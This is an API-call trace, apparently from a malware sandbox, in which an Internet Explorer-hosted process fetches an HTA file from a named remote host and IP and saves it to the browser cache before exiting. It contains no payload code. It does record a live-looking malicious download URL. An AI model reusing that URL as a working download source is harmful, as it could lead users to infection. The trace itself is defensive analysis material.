[0084.506] GetKeyState (nVirtKey=160) returned 0
[0084.506] GetKeyState (nVirtKey=162) returned 0
[0084.506] GetKeyState (nVirtKey=164) returned 0
[0084.506] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x14e900 | out: plResult=0x14e900) returned 0x1
[0084.506] NtdllDefWindowProc_W () returned 0x0
[0084.506] GetCurrentThreadId () returned 0xbcc
[0084.507] GetClientRect (in: hWnd=0x10200, lpRect=0x14ed70 | out: lpRect=0x14ed70) returned 1
[0084.507] GetClientRect (in: hWnd=0x10200, lpRect=0x14eda0 | out: lpRect=0x14eda0) returned 1
[0084.507] UpdateWindow (hWnd=0x10200) returned 1
[0084.507] GetCurrentThreadId () returned 0xbcc
[0084.507] GetCurrentThreadId () returned 0xbcc
[0084.507] GetCurrentThreadId () returned 0xbcc
[0084.507] IsWinEventHookInstalled (event=0x8005) returned 0
[0084.507] StrCmpICW (pszStr1="about:blank", pszStr2="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned -7
[0084.507] StrCmpICW (pszStr1="about:blank", pszStr2="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned -7
[0084.507] GetCurrentThreadId () returned 0xbcc
[0084.507] GetCurrentThreadId () returned 0xbcc
[0084.507] GetCurrentThreadId () returned 0xbcc
[0084.507] GetCurrentThreadId () returned 0xbcc
[0084.520] IntersectRect (in: lprcDst=0x14ee70, lprcSrc1=0x14ee70, lprcSrc2=0x14ee40 | out: lprcDst=0x14ee70) returned 0
[0084.520] IntersectRect (in: lprcDst=0x374fc0, lprcSrc1=0x374fc0, lprcSrc2=0x14ee60 | out: lprcDst=0x374fc0) returned 0
[0084.521] UnionRect (in: lprcDst=0x14f4b0, lprcSrc1=0x14f4b0, lprcSrc2=0x14f440 | out: lprcDst=0x14f4b0) returned 0
[0084.532] IsWinEventHookInstalled (event=0x8005) returned 0
[0084.532] GetCurrentThreadId () returned 0xbcc
[0084.532] GetCurrentThreadId () returned 0xbcc
[0084.532] GetCurrentThreadId () returned 0xbcc
[0084.534] GetMessageTime () returned 147686
[0084.534] GetMessagePos () returned 0x11e0277
[0084.534] GetCursorPos (in: lpPoint=0x14eef0 | out: lpPoint=0x14eef0*(x=791, y=286)) returned 1
[0084.534] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14eef0 | out: lpPoint=0x14eef0) returned 1
[0084.534] GetKeyState (nVirtKey=16) returned 0
[0084.534] GetKeyState (nVirtKey=17) returned 0
[0084.534] GetKeyState (nVirtKey=18) returned 0
[0084.534] GetKeyState (nVirtKey=160) returned 0
[0084.534] GetKeyState (nVirtKey=162) returned 0
[0084.534] GetKeyState (nVirtKey=164) returned 0
[0084.534] GetCursorPos (in: lpPoint=0x14eef0 | out: lpPoint=0x14eef0*(x=791, y=286)) returned 1
[0084.534] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14eef0 | out: lpPoint=0x14eef0) returned 1
[0084.534] GetKeyState (nVirtKey=16) returned 0
[0084.534] GetKeyState (nVirtKey=17) returned 0
[0084.534] GetKeyState (nVirtKey=18) returned 0
[0084.534] GetKeyState (nVirtKey=160) returned 0
[0084.534] GetKeyState (nVirtKey=162) returned 0
[0084.534] GetKeyState (nVirtKey=164) returned 0
[0084.535] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x14f290 | out: plResult=0x14f290) returned 0x1
[0084.535] NtdllDefWindowProc_W () returned 0x0
[0084.535] GetMessageTime () returned 147686
[0084.535] GetMessagePos () returned 0x11e0277
[0084.535] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x14eb10 | out: plResult=0x14eb10) returned 0x0
[0084.535] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0084.535] GetKeyState (nVirtKey=1) returned 1
[0084.535] GetKeyState (nVirtKey=2) returned 0
[0084.535] GetKeyState (nVirtKey=16) returned 0
[0084.535] GetKeyState (nVirtKey=17) returned 0
[0084.535] GetKeyState (nVirtKey=4) returned 0
[0084.535] GetKeyState (nVirtKey=18) returned 0
[0084.535] GetMessageTime () returned 147686
[0084.535] GetMessagePos () returned 0x11e0277
[0084.535] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x14e170 | out: plResult=0x14e170) returned 0x0
[0084.535] GetCurrentThreadId () returned 0xbcc
[0084.535] GetCurrentThreadId () returned 0xbcc
[0084.535] PostQuitMessage (nExitCode=0)
[0084.535] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0084.535] RevokeDragDrop (hwnd=0x10208) returned 0x0
[0084.536] GetCurrentThreadId () returned 0xbcc
[0084.536] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0084.536] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x14f4c0 | out: plResult=0x14f4c0) returned 0x1
[0084.536] NtdllDefWindowProc_W () returned 0x0
[0084.536] GetCurrentThreadId () returned 0xbcc
[0084.536] SetWindowLongPtrW (hWnd=0x10208, nIndex=-21, dwNewLong=0x0) returned 0x31d790
[0084.536] GetMessageW (in: lpMsg=0x14f900, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14f900) returned 1
[0084.536] TranslateMessage (lpMsg=0x14f900) returned 0
[0084.536] DispatchMessageW (lpMsg=0x14f900) returned 0x0
[0084.536] IsWinEventHookInstalled (event=0x8005) returned 0
[0084.536] GetCurrentThreadId () returned 0xbcc
[0084.536] GetMessageW (in: lpMsg=0x14f900, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14f900) returned 0
[0084.536] IsWinEventHookInstalled (event=0x8005) returned 0
[0084.536] GetCurrentThreadId () returned 0xbcc
[0084.536] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x36f340) returned 0x0
[0084.537] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14f728 | out: phkResult=0x14f728*=0x4dc) returned 0x0
[0084.537] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14f730 | out: phkResult=0x14f730*=0x428) returned 0x0
[0084.537] RegOpenKeyExW (in: hKey=0x428, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x14f6b8 | out: phkResult=0x14f6b8*=0x0) returned 0x2
[0084.537] RegOpenKeyExW (in: hKey=0x4dc, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x14f6b8 | out: phkResult=0x14f6b8*=0x0) returned 0x2
[0084.537] RegCloseKey (hKey=0x0) returned 0x6
[0084.537] RegCloseKey (hKey=0x0) returned 0x6
[0084.537] RegCloseKey (hKey=0x4dc) returned 0x0
[0084.537] RegCloseKey (hKey=0x428) returned 0x0
[0084.537] GetCurrentThreadId () returned 0xbcc
[0084.537] GetCurrentThreadId () returned 0xbcc
[0084.537] GetCurrentThreadId () returned 0xbcc
[0084.537] GetCurrentThreadId () returned 0xbcc
[0084.537] GetCurrentThreadId () returned 0xbcc
[0084.537] IUnknown:Release (This=0x362500) returned 0x1
[0084.537] GetCurrentThreadId () returned 0xbcc
[0084.537] GetCurrentThreadId () returned 0xbcc
[0084.537] GetCurrentThreadId () returned 0xbcc
[0084.537] IUnknown:Release (This=0x398850) returned 0x0
[0084.538] ISystemDebugEventFire:EndSession (This=0x362500) returned 0x0
[0084.538] IUnknown:Release (This=0x362500) returned 0x0
[0084.538] GetUserDefaultLCID () returned 0x409
[0084.538] GetACP () returned 0x4e4
[0084.539] IUnknown:Release (This=0x3212c0) returned 0x0
[0084.539] IUnknown:Release (This=0x31e1b8) returned 0x0
[0084.539] IUnknown:Release (This=0x7fee1042708) returned 0x1
[0084.539] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x14f7e0 | out: ppURI=0x14f7e0*=0x30d5a0) returned 0x0
[0084.539] IUri:GetScheme (in: This=0x30d5a0, pdwScheme=0x14f720 | out: pdwScheme=0x14f720*=0x11) returned 0x0
[0084.539] IUnknown:QueryInterface (in: This=0x30d5a0, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f720 | out: ppvObject=0x14f720*=0x30d5a0) returned 0x0
[0084.539] IUnknown:Release (This=0x30d5a0) returned 0x2
[0084.539] IUnknown:AddRef (This=0x30d5a0) returned 0x3
[0084.539] IUnknown:Release (This=0x30d5a0) returned 0x2
[0084.539] IUri:IsEqual (in: This=0x30e180, pUri=0x30d5a0, pfEqual=0x14f7c0 | out: pfEqual=0x14f7c0*=0) returned 0x0
[0084.539] IUnknown:Release (This=0x30e180) returned 0x5
[0084.540] IUnknown:AddRef (This=0x30d5a0) returned 0x3
[0084.540] IUri:GetAbsoluteUri (in: This=0x30d5a0, pbstrAbsoluteUri=0x31f2a0 | out: pbstrAbsoluteUri=0x31f2a0*="about:blank") returned 0x0
[0084.540] IUnknown:Release (This=0x30d5a0) returned 0x2
[0084.540] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x7feff5e0000
[0084.540] GetProcAddress (hModule=0x7feff5e0000, lpProcName="InternetUnlockRequestFile") returned 0x7feff5f70f4
[0084.540] InternetUnlockRequestFile (in: hLockRequestInfo=0x37cdd0 | out: hLockRequestInfo=0x37cdd0) returned 1
[0084.541] IUnknown:Release (This=0x30e180) returned 0x4
[0084.541] IUnknown:Release (This=0x30e180) returned 0x3
[0084.542] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x31e1a8, dwReserved=0x0 | out: ppSM=0x31e1a8*=0x3582d0) returned 0x0
[0084.542] IInternetSecurityManager:SetSecuritySite (This=0x3582d0, pSite=0x31e1b8) returned 0x0
[0084.542] IUnknown:AddRef (This=0x31e1b8) returned 0x31
[0084.542] IUnknown:QueryInterface (in: This=0x31e1b8, riid=0x7fefe4ae970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x14f0f0 | out: ppvObject=0x14f0f0*=0x31e1c0) returned 0x0
[0084.542] IServiceProvider:QueryService (in: This=0x31e1c0, guidService=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x358318 | out: ppvObject=0x358318*=0x0) returned 0x80004002
[0084.542] IServiceProvider:QueryService (in: This=0x31e1c0, guidService=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x358310 | out: ppvObject=0x358310*=0x0) returned 0x80004002
[0084.542] IServiceProvider:QueryService (in: This=0x31e1c0, guidService=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x358308 | out: ppvObject=0x358308*=0x7fee1042708) returned 0x0
[0084.542] IUnknown:Release (This=0x31e1c0) returned 0x0
[0084.542] IUnknown:AddRef (This=0x30d5a0) returned 0x3
[0084.543] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x2ffff0) returned 0x800c0011
[0084.543] IUnknown:AddRef (This=0x7fee1044fa0) returned 0x1
[0084.543] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14e9b0 | out: ppvObject=0x14e9b0*=0x7fee1044fb8) returned 0x0
[0084.543] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0084.543] IInternetProtocolInfo:ParseUrl (in: This=0x7fee1044fb8, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x360c10, cchResult=0xc, pcchResult=0x14e9f0, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x14e9f0*=0xc) returned 0x0
[0084.543] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0084.543] IUnknown:AddRef (This=0x7fee1044fa0) returned 0x1
[0084.543] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14e9b0 | out: ppvObject=0x14e9b0*=0x7fee1044fb8) returned 0x0
[0084.543] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0084.543] IInternetProtocolInfo:ParseUrl (in: This=0x7fee1044fb8, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x360c10, cchResult=0xc, pcchResult=0x14e9f4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x14e9f4*=0x0) returned 0x800c0011
[0084.543] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0084.543] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0084.543] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0084.543] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0084.543] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x14f1f0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x14f1f0*=0x0) returned 0x0
[0084.543] IUnknown:Release (This=0x30d5a0) returned 0x3
[0084.543] IUnknown:Release (This=0x2f5140) returned 0x1
[0084.543] IUnknown:Release (This=0x30d5a0) returned 0x2
[0084.544] IUnknown:Release (This=0x3582d0) returned 0x0
[0084.544] IUnknown:Release (This=0x31e1b8) returned 0x0
[0084.544] IUnknown:Release (This=0x7fee1042708) returned 0x7fff
[0084.544] IUnknown:Release (This=0x31ed90) returned 0x0
[0084.544] IInternetSession:UnregisterNameSpace (This=0x324ce0, pCF=0x7fee1044f60, pszProtocol="res") returned 0x0
[0084.544] IUnknown:Release (This=0x7fee1044f60) returned 0x1
[0084.544] IInternetSession:UnregisterNameSpace (This=0x324ce0, pCF=0x7fee1044fa0, pszProtocol="about") returned 0x0
[0084.544] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0084.544] IUnknown:Release (This=0x324ce0) returned 0x1
[0084.544] IUnknown:Release (This=0x324e70) returned 0x0
[0084.545] GetExitCodeThread (in: hThread=0x3e4, lpExitCode=0x14f730 | out: lpExitCode=0x14f730) returned 1
[0084.545] CloseHandle (hObject=0x210) returned 1
[0084.545] CloseHandle (hObject=0x3e4) returned 1
[0084.545] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x36f340) returned 0x0
[0084.545] ReleaseActCtx (in: hActCtx=0x31b918 | out: hActCtx=0x31b918)
[0084.545] FreeLibrary (hLibModule=0x7fef2350000) returned 1
[0084.545] FreeLibrary (hLibModule=0x7fef2350000) returned 1
[0084.547] UnregisterClassW (lpClassName=0xc199, hInstance=0x7fee0880000) returned 1
[0084.547] UnregisterClassW (lpClassName=0xc197, hInstance=0x7fee0880000) returned 1
[0084.547] OleUninitialize ()
[0084.548] DestroyWindow (hWnd=0x101fc) returned 1
[0084.548] PostQuitMessage (nExitCode=0)
[0084.548] DllCanUnloadNow () returned 0x0
[0084.548] DllCanUnloadNow () returned 0x0
[0084.548] DllCanUnloadNow () returned 0x1
[0084.650] FreeLibrary (hLibModule=0x7fee0880000) returned 1
[0084.650] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0
[0084.650] RtlExitUserProcess (ExitCode=0x0)
Thread:
id = 38
os_tid = 0xbdc
Thread:
id = 42
os_tid = 0xbec
[0063.812] GetCurrentThreadId () returned 0xbec
[0064.184] IInternetProtocolSink:ReportProgress (This=0x352530, ulStatusCode=0x20, szStatusText=0x0) returned 0x0
Thread:
id = 43
os_tid = 0xbf0
[0063.841] GetCurrentThreadId () returned 0xbf0
[0066.796] IInternetProtocolSink:ReportProgress (This=0x352530, ulStatusCode=0x1, szStatusText="www.samyrai777m.p-host.in") returned 0x0
[0066.796] GetCurrentThreadId () returned 0xbf0
[0066.796] PostMessageW (hWnd=0x10204, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0066.798] IInternetProtocolSink:ReportProgress (This=0x352530, ulStatusCode=0x2, szStatusText="185.211.244.133") returned 0x0
[0066.798] GetCurrentThreadId () returned 0xbf0
[0066.883] IInternetProtocolSink:ReportProgress (This=0x352530, ulStatusCode=0xb, szStatusText=0x0) returned 0x0
[0066.979] IHttpNegotiate:OnResponse (in: This=0x3524b8, dwResponseCode=0xc8, szResponseHeaders="HTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Tue, 24 Oct 2017 17:38:08 GMT\r\nContent-Type: application/hta\r\nConnection: keep-alive\r\nVary:User-Agent\r\n\r\n", szRequestHeaders=0x0, pszAdditionalRequestHeaders=0x0 | out: pszAdditionalRequestHeaders=0x0) returned 0x0
[0066.979] IInternetProtocolSink:ReportProgress (This=0x352530, ulStatusCode=0x1f, szStatusText="application/hta") returned 0x0
[0066.979] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc19a
[0066.979] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc19b
[0066.979] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc1c0
[0066.979] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc1a5
[0066.979] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc1a7
[0066.979] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc1a6
[0066.979] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc1ab
[0066.979] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc1ac
[0066.979] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc1ad
[0066.979] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc1af
[0066.980] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc1ae
[0066.980] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc1b1
[0066.980] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc1b2
[0066.980] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc1b3
[0066.980] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc1c1
[0066.980] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc1bf
[0066.980] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc1a9
[0066.980] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc1aa
[0066.980] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc1b0
[0066.980] StrCmpNICW (lpStr1="applicat", lpStr2="text/css", nChar=8) returned -19
[0066.980] IInternetProtocolSink:ReportProgress (This=0x352530, ulStatusCode=0xe, szStatusText="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\t[1].hta") returned 0x0
[0066.980] GetCurrentProcessId () returned 0xbc8
[0066.980] IInternetProtocolSink:ReportData (This=0x352530, grfBSCF=0x11, ulProgress=0x1, ulProgressMax=0x0) returned 0x0
[0066.980] IUnknown:QueryInterface (in: This=0x355f00, riid=0x7fee0f1f430*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2d5d698 | out: ppvObject=0x2d5d698*=0x355f08) returned 0x0
[0066.980] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x355f08, dwOption=0x1, pBuffer=0x2d5e0c0*=0x0, pcbBuf=0x2d5d690*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2d5e0c0*=0x61, pcbBuf=0x2d5d690*=0xf, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0066.989] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x355f08, dwOption=0xffff, pBuffer=0x2d5e1c0*=0x78, pcbBuf=0x2d5d690*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2d5e1c0*=0x76, pcbBuf=0x2d5d690*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.989] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x355f08, dwOption=0x2e, pBuffer=0x2d5dec0*=0x0, pcbBuf=0x2d5d6b0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2d5dec0*=0x76, pcbBuf=0x2d5d6b0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.989] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x355f08, dwOption=0x4000000b, pBuffer=0x2d5d6c8*=0x0, pcbBuf=0x2d5d690*=0x10, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2d5d6c8*=0x76, pcbBuf=0x2d5d690*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.989] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x355f08, dwOption=0xffff, pBuffer=0x2d5dac0*=0x58, pcbBuf=0x2d5d690*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2d5dac0*=0x76, pcbBuf=0x2d5d690*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.989] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x355f08, dwOption=0xffff, pBuffer=0x2d5dac0*=0x44, pcbBuf=0x2d5d690*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2d5dac0*=0x76, pcbBuf=0x2d5d690*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.989] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x355f08, dwOption=0xffff, pBuffer=0x2d5dac0*=0x43, pcbBuf=0x2d5d690*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2d5dac0*=0x76, pcbBuf=0x2d5d690*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.989] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x355f08, dwOption=0xffff, pBuffer=0x2d5dac0*=0x58, pcbBuf=0x2d5d690*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2d5dac0*=0x76, pcbBuf=0x2d5d690*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.989] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x355f08, dwOption=0x20000013, pBuffer=0x3525f0*=0x0, pcbBuf=0x2d5d690*=0x4, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x3525f0*=0xc8, pcbBuf=0x2d5d690*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0066.989] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x355f08, dwOption=0x12, pBuffer=0x2d5d9b0*=0x0, pcbBuf=0x2d5d6b8*=0xf, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x2d5d9b0*=0x48, pcbBuf=0x2d5d6b8*=0x8, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0066.989] StrCmpICA (pszStr1="HTTP/1.0", pszStr2="HTTP/1.1") returned -1
[0066.989] IWinInetInfo:RemoteQueryOption (in: This=0x355f08, dwOption=0x17, pBuffer=0x2d5d6b4*=0x31, pcbBuf=0x2d5d690*=0x4 | out: pBuffer=0x2d5d6b4*=0x0, pcbBuf=0x2d5d690*=0x4) returned 0x0
[0066.989] IWinInetInfo:RemoteQueryOption (in: This=0x355f08, dwOption=0x1f, pBuffer=0x2d5d6b4*=0x0, pcbBuf=0x2d5d690*=0x4 | out: pBuffer=0x2d5d6b4*=0x0, pcbBuf=0x2d5d690*=0x4) returned 0x0
[0066.989] IWinInetInfo:RemoteQueryOption (in: This=0x355f08, dwOption=0x42, pBuffer=0x2d5d6e0*=0xcc, pcbBuf=0x2d5d6ac*=0x2cc | out: pBuffer=0x2d5d6e0*=0xcc, pcbBuf=0x2d5d6ac*=0x2cc) returned 0x0
[0066.989] IWinInetInfo:RemoteQueryOption (in: This=0x355f08, dwOption=0xfffe, pBuffer=0x352660*=0x0, pcbBuf=0x2d5d690*=0x8 | out: pBuffer=0x352660*=0xd0, pcbBuf=0x2d5d690*=0x8) returned 0x0
[0066.990] IUnknown:Release (This=0x355f08) returned 0x5
[0066.990] GetCurrentThreadId () returned 0xbf0
[0066.990] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="application/hta", cchCount1=7, lpString2="charset", cchCount2=7) returned 1
[0066.990] GetCurrentThreadId () returned 0xbf0
[0066.990] GetCurrentThreadId () returned 0xbf0
[0066.990] MulDiv (nNumber=1, nNumerator=4000, nDenominator=1) returned 4000
[0066.990] PostMessageW (hWnd=0x10204, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0066.990] GetCurrentThreadId () returned 0xbf0
[0066.990] IInternetProtocol:Read (in: This=0x355f00, pv=0x383ee0, cb=0x2000, pcbRead=0x2d5eae0 | out: pv=0x383ee0, pcbRead=0x2d5eae0*=0xcf1) returned 0x0
[0066.991] IInternetProtocol:Read (in: This=0x355f00, pv=0x384bd1, cb=0x130f, pcbRead=0x2d5eae0 | out: pv=0x384bd1, pcbRead=0x2d5eae0*=0x0) returned 0x1
[0066.992] IInternetProtocolSink:ReportData (This=0x352530, grfBSCF=0x15, ulProgress=0xcf1, ulProgressMax=0x0) returned 0x0
[0066.992] IInternetProtocolSink:ReportResult (This=0x352530, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0
[0067.000] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pSecMgr=0x0) returned 0x1
[0067.010] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2d5e878 | out: phkResult=0x2d5e878*=0x110) returned 0x0
[0067.010] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2d5e880 | out: phkResult=0x2d5e880*=0x444) returned 0x0
[0067.010] RegOpenKeyExW (in: hKey=0x444, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x2d5e808 | out: phkResult=0x2d5e808*=0x0) returned 0x2
[0067.010] RegOpenKeyExW (in: hKey=0x110, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x2d5e808 | out: phkResult=0x2d5e808*=0x0) returned 0x2
[0067.010] RegCloseKey (hKey=0x0) returned 0x6
[0067.010] RegCloseKey (hKey=0x0) returned 0x6
[0067.010] RegCloseKey (hKey=0x110) returned 0x0
[0067.010] RegCloseKey (hKey=0x444) returned 0x0
